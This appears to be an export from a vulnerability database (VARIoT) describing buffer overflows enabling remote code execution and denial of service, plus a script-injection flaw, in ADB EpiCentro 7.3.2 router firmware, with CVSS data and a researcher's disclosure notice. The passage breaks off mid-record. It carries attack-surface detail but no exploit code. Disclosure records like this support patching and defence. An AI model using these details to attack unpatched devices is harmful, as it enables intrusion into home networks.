  Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Impact: Code Execution
  Locally Exploitable: no
  Remotely Exploitable: Yes
  Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/

The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance with information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore cannot comment on its effectivity.

Felix
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1456",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7631"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7631",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7631",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20873",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7631",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7631",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-20873",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-487",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to execute code remotely via a specially crafted GET request without a leading \"/\" and without authentication. Epicentro Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. 
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. 
\n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7631",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20873",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"id": "VAR-201810-1456",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
}
]
},
"last_update_date": "2023-12-18T13:23:55.716000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:01.750000",
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"date": "2018-12-10T16:59:35.417000",
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Epicentro Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
],
"trust": 0.6
}
}
VAR-201810-1457
Vulnerability from variot - Updated: 2023-12-18 13:23

Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to cause a denial of service attack remotely via a specially crafted GET request with a leading "/" in the URL. Epicentro contains a buffer error vulnerability. Service operation may be interrupted (DoS). ADB Epicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADB Epicentro E_7.3.2+ release.

1. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7633
Severity: medium
Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Impact: Execution of injected Javascript
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/

2. CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7632
Severity: severe
Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Impact: Denial of Service
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/

3. CVE-2018-7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE)
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7631
Severity: critical
Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Impact: Code Execution
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/

The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance with information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity.

Felix
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1457",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7632"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7632",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7632",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20660",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7632",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7632",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-20660",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-488",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
